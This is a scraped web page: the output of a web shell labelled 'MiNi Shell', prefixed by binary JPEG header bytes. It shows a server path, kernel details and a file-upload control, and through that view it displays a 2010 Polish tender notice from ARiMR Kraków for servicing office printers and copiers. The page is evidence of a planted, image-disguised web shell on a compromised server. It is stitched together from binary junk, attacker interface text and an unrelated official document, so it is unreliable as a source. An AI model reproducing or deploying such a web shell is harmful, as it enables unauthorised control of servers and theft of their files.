JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100728/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100728/228714-N-2010.html

<p class="kh_header"><b>Kraków: Serwisowanie sprzętu biurowego (drukarek, kopiarek i faksów) po okresie gwarancyjnym eksploatowanego w Małopolskim Oddziale Regionalnym ARiMR</b><br>
<b>Numer ogłoszenia: 228714 - 2010; data zamieszczenia: 28.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa , ul. Lubicz 25, 31-503 Kraków, woj. małopolskie, tel. 012 6298010, faks 012 4211311.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Serwisowanie sprzętu biurowego (drukarek, kopiarek i faksów) po okresie gwarancyjnym eksploatowanego w Małopolskim Oddziale Regionalnym ARiMR.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia jest  serwisowanie kopiarek, drukarek i faksów będących po okresie gwarancyjnym, eksploatowanych przez Oddział Regionalny i podległe mu Biura Powiatowe
1.	Szczegółowy zakres przedmiotu zamówienia:
Zakresem usługi serwisowania sprzętu jest objęte wykonanie usługi utrzymania sprzętu w należytej sprawności technicznej poprzez usuwanie awarii technicznych powstałych w czasie eksploatacji i dostarczanie części i podzespołów niezbędnych do wykonania powyższych czynności, a także na żądanie Zamawiającego przeglądu i konserwacji sprzętu.
Szczegółowy zakres usługi przeglądu i konserwacji kopiarek i drukarek będących po okresie gwarancyjnym eksploatowanych przez Oddział Regionalny i podległe mu Biura Powiatowe wymienionych w załączniku nr 5 do SIWZ obejmuje:
a)	sprawdzenie urządzenia pod względem ewentualnych uszkodzeń mechanicznych
b)	ekspertyza stanu technicznego
c)	odkurzenie urządzenia z wszelkich nieczystości (toner, pył z papieru itp.)
d)	oczyszczenie układu skanowania mającego bezpośredni wpływ na jakość wydruków
e)	oczyszczenie układu napędowego
f)	oczyszczenie układu zagrzewania druku (wałek dociskowy oraz grzewczy)
g)	oczyszczenie toru prowadzenia papieru (rolki poboru papieru, wałki registracyjne, rolki
prowadzące, rolki wyjścia)
h)         smarowanie elementów układu napędowego oraz innych elementów ruchomych
i)	ewentualna wymiana uszkodzonych części (po uzyskaniu akceptacji Zamawiającego)
j)	sprawdzenie   prawidłowości   poboru   papieru   oraz   podzespołów   urządzenia   po
wykonaniu usługi oraz ewentualne regulacje
k)	oczyszczenie obudowy
l)       	wykonanie wydruków próbnych w celu sprawdzenia jakości usługi
m)         wystawienie szczegółowej Karty Serwisowej, będącą jednocześnie kartą gwarancyjną
na wykonaną usługę
Szczegółowy zakres usługi usuwania awarii technicznych kopiarek, drukarek i faksów będących po okresie gwarancyjnym eksploatowanych przez Oddział Regionalny i podległe mu Biura Powiatowe (stwierdzonych podczas wykonywania przeglądu i konserwacji albo powstałych w trakcie eksploatacji sprzętu wymienionego w załączniku nr 5 do SIWZ obejmuje:
a)	diagnostykę stanu technicznego (ekspertyza)
b)	dostarczenie i wymianę podzespołów niezbędnych dla zapewnienia stałej wysokiej
jakości wydruków i niezawodnej pracy urządzenia
c)	usunięcie awarii technicznej powstałej w trakcie eksploatacji sprzętu
d)	w przypadku czasu naprawy przekraczającego 7 dni od dnia zgłoszenia awarii, Wykonawca zapewnieni na czas naprawy nieodpłatnie sprzęt zastępczy o parametrach nie gorszych niż sprzęt podlegający naprawie wraz z materiałami eksploatacyjnymi do niego najpóźniej 7 dnia od zgłoszenia awarii. Zamawiający w uzasadnionych wypadkach może wyrazić zgodę na odstąpienie od dostarczenia sprzętu zastępczego.
2.   Warunki realizacji zamówienia.
1.	Zamawiający wymaga, aby usługa przeglądu i konserwacji będąca przedmiotem zamówienia
była wykonywana w siedzibie Wykonawcy wyposażonej w aparaturę niezbędną do diagnostyki
i konserwacji sprzętu z zachowaniem należytej staranności, (oraz przy przestrzeganiu
przepisów prawa, a w szczególności przepisów bezpieczeństwa). W uzasadnionych przypadkach Zamawiający może wyrazić zgodę na wykonanie usługi przeglądu i konserwacji w siedzibie Zamawiającego.
2.	Maksymalny termin wykonania usługi przeglądu i konserwacji wynosi 10 dni roboczych od dnia zgłoszenia przez Zamawiającego konkretnego urządzenia

3.	Zamawiający wymaga, aby usuwanie awarii technicznych powstałych w toku eksploatacji sprzętu, było wykonywane w siedzibie Zamawiającego, chyba, że Zamawiający wyraził zgodę na jej wykonanie w siedzibie Wykonawcy, natomiast awarie techniczne stwierdzone w toku usługi przeglądu i konserwacji winny być usunięte w siedzibie Wykonawcy.
4.	Wykonawca udzieli na wymienione części i materiały  eksploatacyjne   gwarancji  minimum  do   momentu wykonania wskazanej w wykazie części i materiałów stanowiącym zał. nr 6 do SIWZ liczby kopii, albo gwarancji na okres minimum 12 m-cy w przypadku, gdy ilość kopii nie została określona.
5.	W przypadku, gdy przewidywany czas naprawy będzie dłuższy niż 7 dni Wykonawca zapewnieni na czas naprawy nieodpłatnie sprzęt zastępczy o parametrach nie gorszych niż sprzęt podlegający naprawie najpóźniej 7 dnia od zgłoszenia awarii. Zamawiający w uzasadnionych wypadkach może wyrazić zgodę na odstąpienie od dostarczenia sprzętu zastępczego. Maksymalny czas wykonania usługi naprawy wynosi  28 dni od dnia zgłoszenia awarii. Do okresu 28 dni czasu na wykonanie naprawy nie wlicza się czasu od dnia otrzymania przez Zamawiającego prawidłowo sporządzonego kosztorysu lub oferty cenowej do dnia zatwierdzenia kosztorysu lub przekazania Wykonawcy części niezbędnej do usunięcia awarii.
6.	W przypadku, gdy w trakcie naprawy zajdzie konieczność użycia części nie objętej wykazem
Wykonawca przedstawi ofertę cenową powyższej części wraz z podaniem numeru katalogowego tej części nadanej przez producenta serwisowanego urządzenia, zaś na żądanie Zamawiającego prześle wypis z katalogu części producenta sprzętu w wersji papierowej lub elektronicznej zawierający podany nr części.
7.	Zamawiający zastrzega sobie prawo zakupu powyższej części u innego Wykonawcy.
8.	W cenę roboczogodziny winny zostać wliczone koszty ekspertyzy i dojazduów.

9.	Ceny (części i stawki roboczogodziny) obowiązywać będą w odniesieniu do wszystkich
zleceń naprawy przyjętych do końca okresu obowiązywania umowy.
10.	Koszty materiałowe rozliczane będą zgodnie z przedstawioną ofertą i wystawionymi na jej podstawie fakturami VAT. Faktury VAT uwzględnią rozdzielenie robocizny i materiałów.
11.	Rozliczenie naprawy awaryjnej dokonywanej w siedzibie Zamawiającego odbywać się będzie każdorazowo na podstawie stawki godzinowej brutto (roboczogodziny) podanej przez wykonawcę w Formularzu ofertowym oraz ilości roboczogodzin potwierdzonej na protokole wykonania usługi przez osobę upoważnioną przez Zamawiającego. Czas wykonywania usługi nie obejmuje dojazdu oraz jego kosztów, a także ekspertyzy. Roboczogodzina obliczana będzie poprzez określenie ilości minut trwania naprawy (wszystkie czynności podejmowane w celu naprawy, bez kosztów i czasu dojazdu oraz ekspertyzy), a następnie podzielenie otrzymanego wyniku przez sześćdziesiąt. Zamawiający zapłaci za każdą rozpoczętą roboczogodzinę.
12.	W przypadku, gdy koszt naprawy przy uwzględnieniu materiałów oraz czasu naprawy będzie zbliżony do 70% wartości urządzenia za zgodą Zamawiającego Wykonawca odstąpi od dokonania naprawy.
13.	W przypadku konieczności dokonania naprawy w siedzibie Wykonawcy wymagana jest akceptacja Zamawiającego. Zamawiający zastrzega sobie prawo do uczestnictwa w czynnościach wykonywanych w siedzibie Wykonawcy.
14.	W przypadku konieczności dokonania naprawy w siedzibie Wykonawcy lub wynikającej z uszkodzenia stwierdzonego podczas wykonywania usługi przeglądu i konserwacji Wykonawca przedstawi Zamawiającemu do akceptacji kosztorys określający ilość roboczogodzin oraz koniecznych części, który będzie stanowił podstawę do rozliczenia. 
15.	W przypadku, gdy Zamawiający nie zaakceptuje przedstawionego kosztorysu, przedmiot naprawy zostanie dostarczony według wyboru Zamawiającego do siedziby Małopolskiego Oddziału Regionalnego albo Biura Powiatowego Zamawiającego, w którym znajdował się sprzęt zabrany do naprawy. Zamawiający zastrzega sobie w takiej sytuacji prawo zlecenia naprawy innemu Wykonawcy. 
16.	Z tytułu czynności, jakie podjął Wykonawca w przypadku określonym, w pkt. 15 niniejszego ustępu nie przysługuje mu wynagrodzenie. 
17.	Wzór Karty Serwisowej pełniącej jednocześnie rolę Protokołu Wykonania Usługi wymaga akceptacji Zamawiającego.
18.	W przypadku zgłoszenia przez Zamawiającego nieprawidłowego wykonania usługi naprawy, Wykonawca nieodpłatnie dokona rozpatrzenia zgłoszenia reklamacyjnego i bezpłatnie dokona usunięcia usterki. W takim przypadku Wykonawca bezpłatnie dokona usunięcia usterki w terminie 7 dni od dnia rozpatrzenia reklamacji oraz pokryje koszt części, których wymiana stała się konieczna na skutek źle wykonanej naprawy, a także zwróci koszt części, które niezasadnie zostały wymienione w ramach reklamowanej usługi.
19.	W ramach czynności naprawy, przez urządzenie jest sygnalizowana konieczność wykonania jego konserwacji lub wymaga powyższego stan urządzenia stwierdzony podczas ekspertyzy mogą zostać wykonane czynności konserwacyjne nie stanowiące usługi przeglądu i konserwacji w rozumieniu niniejszej umowy, lecz czynności usuwania awarii technicznej. Powyższe czynności wykonywane są w siedzibie Zamawiającego i nie stanowią usługi przeglądu i konserwacji w rozumieniu niniejszego SIWZ, w związku z powyższym rozliczenie za powyższe czynności będzie następowało wg stawek za usuwanie awarii technicznych sprzętu.
20.	Zamawiający zastrzega sobie prawo zmiany miejsca instalacji sprzętu wymienionego w zał. nr 5 pomiędzy lokalizacjami w nim wymienionymi lub nową lokalizacją Biura Powiatowego Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4, 50.31.32.00-3, 50.31.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokument wskazujący prawo do reprezentowania wykonawcy przez osobę/osoby podpisaną/e pod ofertą i oświadczeniami albo udzielającą/e pełnomocnictwa, o ile wykonawca nie jest osobą fizyczną.
2. Pełnomocnictwo umocowujące przynajmniej w zakresie podpisania oferty w postępowaniu o udzielenie zamówienia publicznego, dołączone do oferty, o ile ofertę składa pełnomocnik</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 10</li>
<li>2 - Cena łączna na materiały eksploatacyjne i części zamienne - 65</li>
<li>3 - Cena jednej roboczogodziny - 25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
- działania siły wyższej lub wystąpienia stanu wyższej konieczności
- wystąpienia warunków atmosferycznych całkowicie uniemożliwiających wykonanie przedmiotu zamówienia w wyznaczonych terminach
- zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe
- zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia
- omyłek pisarskich lub błędów rachunkowych,
-  mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
-  jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego
- innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2010 godzina 11:00, miejsce: Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków, Dziennik Podawczy, po uprzednim zgłoszeniu się na Punkcie Informacjnym na IV piętrze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com